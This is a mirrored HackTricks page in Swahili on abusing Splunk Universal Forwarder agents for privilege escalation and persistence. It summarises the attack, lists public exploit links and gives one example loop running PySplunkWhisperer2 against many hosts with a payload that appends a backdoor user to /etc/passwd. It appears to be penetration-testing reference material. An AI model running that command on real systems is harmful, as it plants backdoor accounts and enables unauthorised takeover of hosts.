mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
51 lines
3.0 KiB
Markdown
51 lines
3.0 KiB
Markdown
# Splunk LPE na Uendelevu
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|
|
|
|
Ikiwa **unapofanya orodha** ya mashine **ndani** au **nje** unakuta **Splunk inafanya kazi** (bandari 8090), ikiwa kwa bahati unajua **akili halali** unaweza **kutumia huduma ya Splunk** ili **kufanya shell** kama mtumiaji anayekimbia Splunk. Ikiwa root inafanya kazi, unaweza kuongeza mamlaka hadi root.
|
|
|
|
Pia ikiwa wewe ni **tayari root na huduma ya Splunk haisikii tu kwenye localhost**, unaweza **kuiba** faili ya **nenosiri** **kutoka** kwa huduma ya Splunk na **kufungua** nenosiri, au **kuongeza** akili mpya kwake. Na kudumisha uendelevu kwenye mwenyeji.
|
|
|
|
Katika picha ya kwanza hapa chini unaweza kuona jinsi ukurasa wa Splunkd unavyoonekana.
|
|
|
|
## Muhtasari wa Ulaghai wa Splunk Universal Forwarder Agent
|
|
|
|
Kwa maelezo zaidi angalia chapisho [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/). Hii ni muhtasari tu:
|
|
|
|
**Muonekano wa Ulaghai:**
|
|
Ulaghai unaolenga Splunk Universal Forwarder Agent (UF) unaruhusu washambuliaji wenye nenosiri la wakala kutekeleza msimbo wowote kwenye mifumo inayokimbia wakala, ambayo inaweza kuhatarisha mtandao mzima.
|
|
|
|
**Mambo Muhimu:**
|
|
|
|
- Wakala wa UF hauhakiki muunganisho unaokuja au uhalali wa msimbo, hivyo unafanya kuwa hatarini kwa utekelezaji wa msimbo usioidhinishwa.
|
|
- Njia za kawaida za kupata nenosiri ni pamoja na kuzitafuta katika directories za mtandao, kushiriki faili, au nyaraka za ndani.
|
|
- Ulaghai uliofanikiwa unaweza kusababisha ufikiaji wa kiwango cha SYSTEM au root kwenye mwenyeji walioathirika, uhamasishaji wa data, na kuingia zaidi kwenye mtandao.
|
|
|
|
**Utekelezaji wa Ulaghai:**
|
|
|
|
1. Mshambuliaji anapata nenosiri la wakala wa UF.
|
|
2. Anatumia API ya Splunk kutuma amri au skripti kwa wakala.
|
|
3. Vitendo vinavyowezekana ni pamoja na uchimbaji wa faili, usimamizi wa akaunti za mtumiaji, na kuathiri mfumo.
|
|
|
|
**Athari:**
|
|
|
|
- Kuathiri mtandao mzima kwa ruhusa za kiwango cha SYSTEM/root kwenye kila mwenyeji.
|
|
- Uwezekano wa kuzima uandishi wa kumbukumbu ili kuepuka kugunduliwa.
|
|
- Usanidi wa milango ya nyuma au ransomware.
|
|
|
|
**Amri ya Mfano kwa Ulaghai:**
|
|
```bash
|
|
for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done
|
|
```
|
|
**Matukio ya umma yanayoweza kutumika:**
|
|
|
|
- [https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2](https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2)
|
|
- [https://www.exploit-db.com/exploits/46238](https://www.exploit-db.com/exploits/46238)
|
|
- [https://www.exploit-db.com/exploits/46487](https://www.exploit-db.com/exploits/46487)
|
|
|
|
## Kutumia Maswali ya Splunk
|
|
|
|
**Kwa maelezo zaidi angalia chapisho [https://blog.hrncirik.net/cve-2023-46214-analysis](https://blog.hrncirik.net/cve-2023-46214-analysis)**
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|